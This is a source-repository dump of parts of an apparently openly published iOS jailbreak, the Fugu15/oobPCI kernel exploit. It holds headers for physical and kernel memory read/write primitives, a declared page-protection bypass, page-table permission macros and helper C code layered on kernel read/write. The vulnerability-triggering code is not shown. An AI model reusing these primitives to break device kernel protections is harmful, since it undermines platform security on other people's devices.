OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 
25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | 33 | import ; /* for host_page_size() */ 34 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/oobPCI.h: -------------------------------------------------------------------------------- 1 | // 2 | // oobPCI.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | 10 | #ifndef oobPCI_h 11 | #define oobPCI_h 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | bool oobPCI_init(uint64_t *kBase, uint64_t *virtBase, uint64_t *physBase); 18 | 19 | #endif /* oobPCI_h */ 20 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/physrw.h: -------------------------------------------------------------------------------- 1 | // 2 | // physrw.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef physrw_h 10 | #define physrw_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool buildPhysPrimitive(uint64_t kernelBase); 17 | 18 | // R/W 19 | bool physread(uint64_t addr, size_t len, void *buffer); 20 | bool physwrite(uint64_t addr, void *buffer, size_t len); 21 | 22 | uint64_t rp64(uint64_t addr); 23 | uint32_t rp32(uint64_t addr); 24 | uint16_t rp16(uint64_t addr); 25 | uint8_t rp8(uint64_t addr); 26 | 27 | // Address translation 28 | uint64_t translateAddr_inTTEP(uint64_t ttep, uint64_t virt); 29 | uint64_t translateAddr(uint64_t virt); 30 | 31 | // Internal function 32 | // Can be used once to map arbitrary physical memory 33 | uint64_t physrw_map_once(uint64_t addr); 34 | 35 | #endif /* physrw_h */ 36 |
--------------------------------------------------------------------------------
/Exploits/oobPCI/Sources/sleep.c:
--------------------------------------------------------------------------------
#include "includeme.h"
#include "generated/task.h"

/* Wait primitive implemented outside this file; only its prototype is visible here. */
int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec);

/* Semaphore that nanosleep() waits on. Created on first use; never destroyed in this file. */
semaphore_t clock_sem = 0;

/*
 * Sleeps by waiting on clock_sem with a timeout.
 *
 * Unlike POSIX nanosleep(), this version takes the seconds and nanoseconds
 * by value. It forwards them to __semwait_signal() with mutex_sem = 0 and
 * the `timeout` and `relative` arguments both set to 1, and returns
 * whatever that call returns.
 *
 * NOTE(review): the result of semaphore_create() is not checked, and the
 * lazy creation of clock_sem is not synchronised between threads.
 */
int nanosleep(int64_t tv_sec, int32_t tv_nsec)
{
    const int noMutex = 0;
    const int useTimeout = 1;
    const int isRelative = 1;

    if (clock_sem == 0) {
        semaphore_create(mach_task_self_, (semaphore_t *)&clock_sem, 0, 0);
    }

    return __semwait_signal(clock_sem, noMutex, useTimeout, isRelative, tv_sec, tv_nsec);
}


/*
 * Sleeps for `useconds` microseconds by splitting the value into whole
 * seconds and a nanosecond remainder and calling nanosleep().
 * Returns the result of nanosleep().
 */
int usleep(uint64_t useconds)
{
    const uint64_t wholeSeconds = useconds / 1000000;
    const uint64_t leftoverNanos = 1000 * (useconds % 1000000);

    /* The remainder is below 10^9, so it fits the int32_t parameter. */
    return nanosleep(wholeSeconds, leftoverNanos);
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.h: -------------------------------------------------------------------------------- 1 | int nanosleep(int64_t tv_sec, int32_t tv_nsec); 2 | int usleep(uint64_t useconds); 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/task.defs: 
-------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/thread.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 
3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/tlbFail.h: -------------------------------------------------------------------------------- 1 | // 2 | // tlbFail.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef tlbFail_h 10 | #define tlbFail_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool pplBypass(void); 17 | 18 | void* getPhysMapWindow(uint64_t phys); 19 | 20 | bool physwrite_PPL(uint64_t addr, void *buffer, size_t len); 21 | bool kernwrite_PPL(uint64_t addr, void *buffer, size_t len); 22 | 23 | uint64_t pmap_lv2(uint64_t pmap, uint64_t virt); 24 | 25 | #endif /* tlbFail_h */ 26 |
--------------------------------------------------------------------------------
/Exploits/oobPCI/Sources/virtrw.c:
--------------------------------------------------------------------------------
#include "virtrw.h"

/*
 * Byte-granular read/write helpers layered on the 32-bit and 64-bit
 * primitives kread32, kwrite32 and kread64, which virtrw.h declares as
 * block pointers. Nothing in this file assigns those pointers.
 */

/*
 * Copies `size` bytes starting at `kaddr` into `output`.
 *
 * The range is fetched one 32-bit word at a time with kread32(). When
 * `size` is not a multiple of 4, the last kread32() also reads up to three
 * bytes past the requested range; only the requested bytes are stored.
 *
 * NOTE(review): the running offset is a uint32_t that is compared with a
 * size_t, and `kaddr + size` is not checked for wrap-around.
 */
void kreadbuf(uint64_t kaddr, void* output, size_t size)
{
    unsigned char *dst = (unsigned char *)output;
    const uint64_t limit = kaddr + size;
    uint32_t copied = 0;

    for (uint64_t wordAddr = kaddr; wordAddr < limit; wordAddr += 4) {
        uint32_t word = kread32(wordAddr);
        const unsigned char *wordBytes = (const unsigned char *)&word;

        /* Store at most four bytes, stopping as soon as the request is satisfied. */
        for (int b = 0; b < 4 && copied != size; b++) {
            dst[copied] = wordBytes[b];
            copied++;
        }

        if (copied == size) {
            break;
        }
    }
}

/*
 * Writes `size` bytes from `input` to `kaddr` using kwrite32().
 *
 * Full words are written directly. For a trailing partial word the current
 * word is first fetched with kread32(), the leading bytes are replaced, and
 * the word is written back, so the bytes after the range keep the value
 * that was read. The read and the write are two separate calls.
 *
 * NOTE(review): the running offset is a uint32_t, and `kaddr + size` is not
 * checked for wrap-around.
 */
void kwritebuf(uint64_t kaddr, void* input, size_t size)
{
    const unsigned char *src = (const unsigned char *)input;
    const uint64_t limit = kaddr + size;
    uint32_t consumed = 0;

    for (uint64_t wordAddr = kaddr; wordAddr < limit; wordAddr += 4) {
        const uint64_t bytesLeft = limit - wordAddr;
        const int isPartial = bytesLeft < 4;

        /* Start from the existing word only when part of it must survive. */
        uint32_t word = isPartial ? kread32(wordAddr) : 0;
        const int byteCount = isPartial ? (int)bytesLeft : 4;

        unsigned char *wordBytes = (unsigned char *)&word;
        for (int b = 0; b < byteCount; b++) {
            wordBytes[b] = src[consumed];
            consumed++;
        }

        kwrite32(wordAddr, word);
    }
}

/* Reads a 16-bit value at `kaddr` through kreadbuf(). */
uint16_t kread16(uint64_t kaddr)
{
    uint16_t value;
    kreadbuf(kaddr, &value, sizeof(value));
    return value;
}

/* Reads an 8-bit value at `kaddr` through kreadbuf(). */
uint8_t kread8(uint64_t kaddr)
{
    uint8_t value;
    kreadbuf(kaddr, &value, sizeof(value));
    return value;
}

/* Writes the 16-bit `val` at `kaddr` through kwritebuf() (read-modify-write of one word). */
void kwrite16(uint64_t kaddr, uint16_t val)
{
    kwritebuf(kaddr, &val, sizeof(val));
}

/* Writes the 8-bit `val` at `kaddr` through kwritebuf() (read-modify-write of one word). */
void kwrite8(uint64_t kaddr, uint8_t val)
{
    kwritebuf(kaddr, &val, sizeof(val));
}

/*
 * Reads a 64-bit value with kread64(). When bit 55 of the value is set,
 * bits 39-63 are forced to one (OR with 0xFFFFFF8000000000); otherwise the
 * value is returned unchanged.
 * NOTE(review): presumably this normalises a pointer whose upper bits carry
 * extra data - confirm against the callers.
 */
uint64_t kread_ptr(uint64_t kaddr) {
    const uint64_t raw = kread64(kaddr);
    const int bit55Set = (raw >> 55) & 1;

    return bit55Set ? (raw | 0xFFFFFF8000000000) : raw;
}
-------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | uint64_t (^kread64)(uint64_t kaddr); 6 | uint32_t (^kread32)(uint64_t kaddr); 7 | 8 | void (^kwrite64)(uint64_t kaddr, uint64_t val); 9 | void (^kwrite32)(uint64_t kaddr, uint32_t val); 10 | 11 | void kreadbuf(uint64_t kaddr, void* output, size_t size); 12 | void kwritebuf(uint64_t kaddr, void* input, size_t size); 13 | 14 | uint16_t kread16(uint64_t kaddr); 15 | uint8_t kread8(uint64_t kaddr); 16 | 17 | void kwrite16(uint64_t kaddr, uint16_t val); 18 | void kwrite8(uint64_t kaddr, uint8_t val); 19 | 20 | uint64_t kread_ptr(uint64_t kaddr); 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/xprr.h: -------------------------------------------------------------------------------- 1 | // 2 | // xprr.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef xprr_h 10 | #define xprr_h 11 | 12 | #define PTE_TO_PERM(pte) ((((pte) >> 4ULL) & 0xC) | (((pte) >> 52ULL) & 2) | (((pte) >> 54ULL) & 1)) 13 | #define _PERM_TO_PTE(perm) ((((perm) & 0xC) << 4ULL) | (((perm) & 2) << 52ULL) | (((perm) & 1) << 54ULL)) 14 | #define PERM_TO_PTE(perm) _PERM_TO_PTE((uint64_t) (perm)) 15 | 16 | #define PERM_KRW_URW 0x7 // R/W for kernel and user 17 | 18 | #define PTE_NON_GLOBAL (1ULL << 11ULL) 19 | #define PTE_VALID (1ULL << 10ULL) // Access flag 20 | #define PTE_OUTER_SHAREABLE (2ULL << 8ULL) 21 | #define PTE_INNER_SHAREABLE (3ULL << 8ULL) 22 | 23 | #define PTE_LEVEL3_ENTRY (PTE_VALID | 0x3ULL) 24 | 25 | #endif /* xprr_h */ 26 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars Fröder (opa334) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LICENSE_Fugu15.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | all %: 3 | @./BaseBin/pack.sh 4 | @xattr -rc Tools >/dev/null 2>&1 5 | $(MAKE) -C Exploits/oobPCI $@ 6 | $(MAKE) -C Dopamine $@ 7 | 8 | clean: 9 | @./BaseBin/clean.sh 10 | 11 | update: all 12 | @./jbupdate.sh 13 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 
3 | 4 | import PackageDescription 5 | // Manifest for the Fugu15KernelExploit library product. Its target depends on the local CBindings target, the remote SwiftUtils package and three sibling packages referenced by relative path. 6 | let package = Package( 7 | name: "Fugu15KernelExploit", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "Fugu15KernelExploit", 16 | targets: ["Fugu15KernelExploit"]) 17 | ], 18 | dependencies: [ 19 | .package(url: "https://github.com/pinauten/SwiftUtils", .branch("master")), // NOTE(review): this requirement follows a moving branch. The committed Package.resolved records revision 1d37faabb4c58b3152394c9b6e1c1a68507646b9, but a package update re-resolves to whatever master points at then; a .revision(...) requirement would keep the reviewed code and the built code the same. 20 | .package(path: "../ProcessCommunication"), 21 | .package(path: "../PatchfinderUtils"), 22 | .package(path: "../KernelPatchfinder"), 23 | ], 24 | targets: [ 25 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 26 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 27 | .target(name: "CBindings"), 28 | .target( 29 | name: "Fugu15KernelExploit", 30 | dependencies: ["CBindings", "SwiftUtils", "ProcessCommunication", "PatchfinderUtils", "KernelPatchfinder"]), 31 | ] 32 | ) 33 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/README.md: -------------------------------------------------------------------------------- 1 | # Fugu15KernelExploit 2 | 3 | This package can be used to easily launch the Fugu15 kernel exploit and use it's capabilities. 4 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/CBindings.h: -------------------------------------------------------------------------------- 1 | // 2 | // CBindings.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef CBindings_h 10 | #define CBindings_h 11 | 12 | #include 13 | #include 14 | #import 15 | #include 16 | 17 | #include "posix_spawn.h" 18 | #include "th_state.h" 19 | #include "libjailbreak.h" 20 | #include "wifi.h" 21 | 22 | extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path); 23 | extern int loadEmbeddedSignature(NSString* filePath); 24 | uint64_t getPCIMemorySize(void); 25 | //NSString *getBootManifestHash(void); 26 | 27 | // Also define some IOKit stuff... 28 | extern const mach_port_t kIOMainPortDefault; 29 | 30 | extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); 31 | extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options); 32 | extern kern_return_t IOObjectRelease(mach_port_t object); 33 | 34 | extern uint64_t reboot3(uint64_t how, uint64_t unk); 35 | 36 | #endif /* CBindings_h */ 37 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/th_state.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 
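12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | 24 | #ifndef TH_STATE_H_ 25 | #define TH_STATE_H_ 26 | 27 | #include 28 | #include 29 | 30 | #ifdef __arm64__ 31 | 32 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts); 33 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc); 34 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts); 35 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr); 36 | 37 | #endif /* defined __arm64__ */ 38 | 39 | struct exception_message_reply { 40 | mach_msg_header_t hdr; 41 | NDR_record_t NDR; 42 | kern_return_t result; 43 | }; 44 | 45 | #endif /* !defined TH_STATE_H_ */ 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/wifi.h: -------------------------------------------------------------------------------- 1 | bool wifiIsEnabled(void); 2 | void setWifiEnabled(bool enabled);
--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/pci_offset.m:
--------------------------------------------------------------------------------
#import
#import
#import

/*
 * Reads the "length" of the first entry of the first range in a registry
 * entry's "IODeviceMemory" property.
 *
 * The property comes from the I/O Registry and is treated as untrusted
 * data: every level is type-checked before it is used, so a missing or
 * differently shaped property yields NO instead of a crash.
 *
 * Returns YES and stores the value in *outLength on success.
 */
static BOOL readFirstDeviceMemoryLength(io_service_t service, uint64_t *outLength)
{
    CFMutableDictionaryRef properties = NULL;
    kern_return_t kr = IORegistryEntryCreateCFProperties(service, &properties, kCFAllocatorDefault, kNilOptions);
    if (kr != KERN_SUCCESS || properties == NULL) {
        return NO;
    }

    BOOL found = NO;

    /* CFDictionaryGetValue returns NULL when the key is absent; CFGetTypeID must not see NULL. */
    CFTypeRef memory = CFDictionaryGetValue(properties, CFSTR("IODeviceMemory"));
    if (memory != NULL && CFGetTypeID(memory) == CFArrayGetTypeID()) {
        NSArray *ranges = (__bridge NSArray *)memory;
        id firstRange = ranges.firstObject;
        if ([firstRange isKindOfClass:[NSArray class]]) {
            id firstEntry = ((NSArray *)firstRange).firstObject;
            if ([firstEntry isKindOfClass:[NSDictionary class]]) {
                id length = ((NSDictionary *)firstEntry)[@"length"];
                if ([length isKindOfClass:[NSNumber class]]) {
                    *outLength = [(NSNumber *)length unsignedLongLongValue];
                    found = YES;
                }
            }
        }
    }

    CFRelease(properties);
    return found;
}

/*
 * Returns the device memory length reported for the IOPCIDevice service
 * named "wlan", or 0 when no such service or no usable length is found.
 *
 * Walks every IOPCIDevice match, releases each service object after use,
 * and releases the iterator before returning. If several "wlan" services
 * carry a usable length, the last one wins.
 */
uint64_t getPCIMemorySize(void)
{
    uint64_t pciMemorySize = 0;

    io_iterator_t iterator;
    kern_return_t kr;

    kr = IOServiceGetMatchingServices(kIOMainPortDefault, IOServiceMatching("IOPCIDevice"), &iterator);
    if (kr != KERN_SUCCESS) {
        printf("Error finding IOPCIDevice: %x\n", kr);
        return 0;
    }

    io_service_t service = IOIteratorNext(iterator);
    while (service) {
        io_name_t name;
        kr = IORegistryEntryGetName(service, name);
        if (kr == KERN_SUCCESS && strcmp(name, "wlan") == 0) {
            uint64_t length = 0;
            if (readFirstDeviceMemoryLength(service, &length)) {
                pciMemorySize = length;
            }
        }
        IOObjectRelease(service);
        service = IOIteratorNext(iterator);
    }
    IOObjectRelease(iterator);

    return pciMemorySize;
}
-------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/th_state.c: -------------------------------------------------------------------------------- 1 | // 2 | // th_state.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 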
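//

/* NOTE(review): the #include targets in this file are missing on this page. */
#include
#include

#ifdef __arm64__

#include

/* Returns the program counter read from *ts via arm_thread_state64_get_pc. */
uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts) {
    return arm_thread_state64_get_pc(*ts);
}

/*
 * Stores pc in *ts. The value is first signed as a function pointer
 * (ptrauth_key_function_pointer, discriminator 0), because
 * arm_thread_state64_set_pc_fptr takes a function pointer.
 */
void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc) {
    void *ptr = ptrauth_sign_unauthenticated((void*)pc, ptrauth_key_function_pointer, 0);
    arm_thread_state64_set_pc_fptr(*ts, ptr);
}

/* Returns the link register read from *ts via arm_thread_state64_get_lr. */
uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts) {
    return arm_thread_state64_get_lr(*ts);
}

/* Stores lr in *ts, signed the same way as in thread_state64_set_pc. */
void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr) {
    void *ptr = ptrauth_sign_unauthenticated((void*)lr, ptrauth_key_function_pointer, 0);
    arm_thread_state64_set_lr_fptr(*ts, ptr);
}

#endif /* defined __arm64__ */

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/wifi.m:
--------------------------------------------------------------------------------
// NOTE(review): the two #import targets below are missing on this page.
#import
#import

// Client handle and entry points resolved at runtime from the private
// MobileWiFi framework. All of them stay NULL when resolution fails.
void *wifiManager = NULL;
void *(*WiFiManagerClientCreate)(CFAllocatorRef allocator, int flags);
CFPropertyListRef (*WiFiManagerClientCopyProperty)(void *manager, CFStringRef property);
void (*WiFiManagerClientSetProperty)(void *manager, CFStringRef property, CFPropertyListRef value);

/*
 * Loads MobileWiFi once per process and resolves the three client functions.
 * dlopen/dlsym results are checked: a missing framework or symbol leaves the
 * corresponding pointer NULL instead of leading to a call through NULL.
 */
void loadWifiManager(void)
{
    static dispatch_once_t onceToken;
    dispatch_once (&onceToken, ^{
        void *wifiHandle = dlopen("/System/Library/PrivateFrameworks/MobileWiFi.framework/MobileWiFi", RTLD_NOW);
        if (wifiHandle == NULL) {
            return;
        }
        WiFiManagerClientCreate = dlsym(wifiHandle, "WiFiManagerClientCreate");
        WiFiManagerClientCopyProperty = dlsym(wifiHandle, "WiFiManagerClientCopyProperty");
        WiFiManagerClientSetProperty = dlsym(wifiHandle, "WiFiManagerClientSetProperty");
        if (WiFiManagerClientCreate != NULL) {
            wifiManager = WiFiManagerClientCreate(kCFAllocatorDefault, 0);
        }
    });
}

/*
 * Returns the boolean value of the manager's "AllowEnable" property.
 * Returns false when the framework could not be loaded, the property is
 * absent, or the property is not a CFBoolean.
 */
bool wifiIsEnabled(void)
{
    loadWifiManager();

    if (wifiManager == NULL || WiFiManagerClientCopyProperty == NULL) {
        return false;
    }

    CFPropertyListRef isEnabled = WiFiManagerClientCopyProperty(wifiManager, CFSTR("AllowEnable"));
    bool isEnabledBool = false;
    if (isEnabled) {
        // The copied property is an untyped plist value; only read it as a
        // boolean when it really is one.
        if (CFGetTypeID(isEnabled) == CFBooleanGetTypeID()) {
            isEnabledBool = CFBooleanGetValue((CFBooleanRef)isEnabled);
        }
        CFRelease(isEnabled);
    }
    return isEnabledBool;
}

/*
 * Sets the manager's "AllowEnable" property to enabled.
 * Does nothing when the framework could not be loaded.
 */
void setWifiEnabled(bool enabled)
{
    loadWifiManager();

    if (wifiManager == NULL || WiFiManagerClientSetProperty == NULL) {
        return;
    }

    WiFiManagerClientSetProperty(wifiManager, CFSTR("AllowEnable"), enabled ? kCFBooleanTrue : kCFBooleanFalse);
}

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/xpc/XPC.apinotes:
--------------------------------------------------------------------------------
Name: XPC
Functions:
# xpc_object
- Name: xpc_retain
  Availability: nonswift
- Name: xpc_release
  Availability: nonswift

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/xpc/debug.h:
--------------------------------------------------------------------------------
#ifndef __XPC_DEBUG_H__
#define __XPC_DEBUG_H__

/*!
 * @function xpc_debugger_api_misuse_info
 * Returns a pointer to a string describing the reason XPC aborted the calling
 * process. On OS X, this will be the same string present in the "Application
 * Specific Information" section of the crash report.
 *
 * @result
 * A pointer to the human-readable string describing the reason the caller was
 * aborted. If XPC was not responsible for the program's termination, NULL will
 * be returned.
 *
 * @discussion
 * This function is only callable from within a debugger. It is not meant to be
 * called by the program directly.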
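*/
XPC_DEBUGGER_EXCL
const char *
xpc_debugger_api_misuse_info(void);

#endif // __XPC_DEBUG_H__

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/xpc/endpoint.h:
--------------------------------------------------------------------------------
#ifndef __XPC_ENDPOINT_H__
#define __XPC_ENDPOINT_H__

/*!
 * @function xpc_endpoint_create
 * Creates a new endpoint from a connection that is suitable for embedding into
 * messages.
 *
 * @param connection
 * Only connections obtained through calls to xpc_connection_create*() may be
 * given to this API. Passing any other type of connection is not supported and
 * will result in undefined behavior.
 *
 * @result
 * A new endpoint object.
 */
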